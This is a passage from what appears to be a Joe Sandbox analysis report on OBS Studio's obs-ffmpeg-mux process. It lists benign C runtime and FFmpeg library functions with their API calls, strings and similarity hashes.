Sleep.KERNEL32(?,?,?,00007FF8BFBA1BA8,?,?,?,?,?,00000002,00000000,00007FF8BFBA4983), ref: 00007FF8BFBA5D92
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8BFBA1BA8,?,?,?,?,?,00000002,00000000,00007FF8BFBA4983), ref: 00007FF8BFBA5DA9

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CloseEventHandleSleep_errnofree
String ID:
API String ID: 1909294951-0
Opcode ID: fb46983425866d5872816068a530570fbf95f67e655fb18db1a897369a563da2
Instruction ID: d21a5c8f228c48364a8c8cd8348019edf7b7281a8ac5ca6738877d04efaca657
Opcode Fuzzy Hash: fb46983425866d5872816068a530570fbf95f67e655fb18db1a897369a563da2
Instruction Fuzzy Hash: B3115C31A08A4382EA249FA9E454A7E73A0EF44790F545431DBAE46EE1DF3CE945CB00

Function 00007FF8BFB84710 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB86710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB8239E), ref: 00007FF8BFB8671E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF8BFB847E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB84844

Strings

csm, xrefs: 00007FF8BFB848EA

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction ID: 7bc1cc7452f4d0ac5b83cb7f27a53b20af2dd90039f4fd886a53c17caf4633ad
Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
Instruction Fuzzy Hash: 83514A36A1978186E620AF69E44026E77A5FBC9BD0F140539EF8D07B56CF3CE461CB40

Function 00007FF8BFB89BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB89CAA

Strings

void, xrefs: 00007FF8BFB89C0C
void , xrefs: 00007FF8BFB89C34

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction ID: b0e7cd1ab735b557ffa57511cdee4b5ddc9ad0fff4eb27122e2218c427f3eeb7
Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
Instruction Fuzzy Hash: 38310862E18B5998FB11DBA8D8410FC37B4BB88788F44413AEF4E62B5ADF389144C750

Function 00007FF8BFB62EC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8BFB62F3C

Strings

cos, xrefs: 00007FF8BFB62F4A, 00007FF8BFB62F9C

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: cos
API String ID: 2918714741-2662988677
Opcode ID: 3dedc7b003d8cb5d8982c9379cb08930f2b1518781c78ce34f340fed2c860ab8
Instruction ID: 7e227b67f3c167654f82b1fef40e5344e609ae8ff1b8edc2889cbfd83c9fd78a
Opcode Fuzzy Hash: 3dedc7b003d8cb5d8982c9379cb08930f2b1518781c78ce34f340fed2c860ab8
Instruction Fuzzy Hash: FC21F522D0DA8652FB025F78A44117BB321FFD5344F189235FB8D1569ADF6DE0D08604

Function 00007FF8A7C8D8E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C8D960
_errno.MSVCRT ref: 00007FF8A7C8D9C0

Strings

log, xrefs: 00007FF8A7C8D97C, 00007FF8A7C8D9DC

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: log
API String ID: 2918714741-2403297477
Opcode ID: fa12abfb3e14b30e677fb45da5cfe9a9bbeb6b1c1569a3c707cd0e3862981db9
Instruction ID: b96d686de30370feafab82f175e796105f87366443859c2d8ab9d9fc7b5ac706
Opcode Fuzzy Hash: fa12abfb3e14b30e677fb45da5cfe9a9bbeb6b1c1569a3c707cd0e3862981db9
Instruction Fuzzy Hash: 8C212422D1EE86D2F7029F24A41037F6765FFD5384F10A334E68D15599DF2DE091AB00

Function 00007FF8A7C8D4E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C8D55C

Strings

cos, xrefs: 00007FF8A7C8D56A, 00007FF8A7C8D5BC

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: cos
API String ID: 2918714741-2662988677
Opcode ID: 903857df638d29162f1127ec14efd8d82056fcd9a594b0710213474096d9e04a
Instruction ID: 9a33d20b95d1818bbc3beb8c7f7ec42331bb80aa2455d1229e101f220481392a
Opcode Fuzzy Hash: 903857df638d29162f1127ec14efd8d82056fcd9a594b0710213474096d9e04a
Instruction Fuzzy Hash: A6210E62D1EF8982FB025F38A40027E6760EFD5348F24A335FA991559ADF3DE0D19704

Function 00007FF8A7C8E120 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C8E19C

Strings

sin, xrefs: 00007FF8A7C8E1AA, 00007FF8A7C8E1FC

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: sin
API String ID: 2918714741-3083047850
Opcode ID: 1712686245d460706722795bac48a202a04de283def8482a719af71ef36c7ef1
Instruction ID: 4b9051529025ea4a7aada5c8046de229e65e96325f0df4c10c8f43f2e7761ee8
Opcode Fuzzy Hash: 1712686245d460706722795bac48a202a04de283def8482a719af71ef36c7ef1
Instruction Fuzzy Hash: BD210162D0EB8692FB025F34A41027F6720FFD1384F14A334FA9A2559ADF2DE5D1AB04

Function 00007FF8A7BEFFF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59stringCOMMON

Download Yara Rule

APIs

strftime.MSVCRT ref: 00007FF8A7BF0061

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 00007FF8A7BF0057
.%06dZ, xrefs: 00007FF8A7BF0092

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strftime
String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
API String ID: 1100141660-930656424
Opcode ID: 6197a247b2b8d8ceb3bdce396f44f74d54b797a4093b4ad4865344da7c3ecd53
Instruction ID: 6bb5afa4c074605e61cfb095c2f6b01e3d8c0c22afe46b473aeba7362cf2b7cf
Opcode Fuzzy Hash: 6197a247b2b8d8ceb3bdce396f44f74d54b797a4093b4ad4865344da7c3ecd53
Instruction Fuzzy Hash: 031125A270A64264EB608F227C009EA5611EB49BF4F885332ED7D5B7D5EE3CE042E240

Function 00007FF8BFB8604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB863F0: RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB86434
Part of subcall function 00007FF8BFB863F0: RaiseException.KERNEL32 ref: 00007FF8BFB8647A

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB860BF

Strings

Access violation - no RTTI data!, xrefs: 00007FF8BFB8604F
Bad dynamic_cast!, xrefs: 00007FF8BFB86072

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction ID: 29dc32ae02688151da9f3e6a561be090f9ab8d7562356f82436813cc840d8be2
Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
Instruction Fuzzy Hash: 73017161A29A4691EF409B9CE8915786361FFD07D4F40A431E74E076A7EF6CD905C700

Function 00007FF8BFB63940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

av_channel_layout_describe.AVUTIL-58 ref: 00007FF8BFB63999
av_log.AVUTIL-58 ref: 00007FF8BFB639B0

Strings

Treating %s as mono, xrefs: 00007FF8BFB639A9

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_channel_layout_describeav_log
String ID: Treating %s as mono
API String ID: 2946648090-2429896034
Opcode ID: 25249c404e77cebffcfa5134640f119eef46f531f346a7abaed1bc42c180491e
Instruction ID: 0301a9c1b45cf4b6ca23f2d46893d14ceee507ddc4e2c5b2ef116dfc78e0445b
Opcode Fuzzy Hash: 25249c404e77cebffcfa5134640f119eef46f531f346a7abaed1bc42c180491e
Instruction Fuzzy Hash: 3101F46270864560FB51C646F80876BB244B7467C8F848031DE888B381DE3ED08EC700

Function 00007FF8BFB863F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BFB86434
RaiseException.KERNEL32 ref: 00007FF8BFB8647A

Strings

csm, xrefs: 00007FF8BFB86467

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction ID: 9607bbd2befaff7524da891084c84affe2e732df437acba98c10ac629ad90ad7
Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
Instruction Fuzzy Hash: AC111F32618B8182EB518F59F44026977A5FB88BD4F588235DF8D07759DF3DD951C700

Function 00007FF8A7C07870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_aligned_malloc.MSVCRT ref: 00007FF8A7C07898

Strings

Microsoft Primitive Provider, xrefs: 00007FF8A7C07872

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_malloc
String ID: Microsoft Primitive Provider
API String ID: 175129771-4132848957
Opcode ID: 61d24a781ba67f0d1d7f4682cf0f95fd41d5d8f035c987dadc3b785e5cf7c726
Instruction ID: f46a854dad08aa1adb94040fcb688bcc8dc3f82a8f2c054e60a2545710a5b1cc
Opcode Fuzzy Hash: 61d24a781ba67f0d1d7f4682cf0f95fd41d5d8f035c987dadc3b785e5cf7c726
Instruction Fuzzy Hash: 16F0BE51F0B52620FF999B833801AB842919F48BD6D484A35DE1C6B781EC3CA882E784

Function 00007FF8A7BEDDB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BEDEE3

Strings

src/libavutil/crc.c, xrefs: 00007FF8A7BEDEB8
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BEDECF

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$src/libavutil/crc.c
API String ID: 4206212132-3600904276
Opcode ID: bba2b5a7149953d7c06390e03a8456bfcd7d5d25b4af83ad1be5f4adfa0ba47c
Instruction ID: 28ccd97c38ca1f84622a83a1db37ac4524a4eb83abc2a1ea1a56d606e57e05e4
Opcode Fuzzy Hash: bba2b5a7149953d7c06390e03a8456bfcd7d5d25b4af83ad1be5f4adfa0ba47c
Instruction Fuzzy Hash: 18E06DB1A0AA46F1EB14AF60F4452FD77A6EF48381F80863AD54C06362DE3CE205D744

Function 00007FF8A7C97F10 Relevance: 5.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF8A7C97F57
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97F81

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: dbaf99fa4423a1f3adf368dfeb11cd1e5322a0253855be351de1d8e7fc337a2b
Instruction ID: a9a539bc5dec55f8fca5e35e51b0d6f68ca2e3087ca4d3504ad4c03cc53c201f
Opcode Fuzzy Hash: dbaf99fa4423a1f3adf368dfeb11cd1e5322a0253855be351de1d8e7fc337a2b
Instruction Fuzzy Hash: D9315E73A06A42D6E7C5CF31D44076E6390FB40BACF589236DE294A388DB38D955D750

Function 00007FF8A7C97DD0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF8A7C97E17
LeaveCriticalSection.KERNEL32 ref: 00007FF8A7C97E3E

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3daa023327df31125aad0ab46ab992fec0b38e9f634fe2131313756e927dbfc2
Instruction ID: 5a2a29f482f8fd933f2132e4eec83bf6824628686040a76fd4a8f9a14c1fa1b4
Opcode Fuzzy Hash: 3daa023327df31125aad0ab46ab992fec0b38e9f634fe2131313756e927dbfc2
Instruction Fuzzy Hash: F7317373A0AA02DEEB95CF35D40426D33A1FB44B98F588635DD2D4A788EF38D845DB50

Function 00007FF8BFB8672C Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF8BFB865B9,?,?,?,?,00007FF8BFB8FB22,?,?,?,?,?), ref: 00007FF8BFB8674B
SetLastError.KERNEL32(?,?,?,00007FF8BFB865B9,?,?,?,?,00007FF8BFB8FB22,?,?,?,?,?), ref: 00007FF8BFB867D4

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction ID: cdae89b67f277437b1621790ef23fdbcaa88c32460ce514c05cfa10dd52901b7
Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
Instruction Fuzzy Hash: AA11E228E0D65682FA5497A9A8641352392AF89BE0F148A3CDF6E077D6DE3CFC51C740

Function 00007FF8A7C97B90 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97BB6
LeaveCriticalSection.KERNEL32(?,?,00007FF8A7C97EA7,?,?,?,?,?,?,?,?,00007FF8A7C21502), ref: 00007FF8A7C97BDB
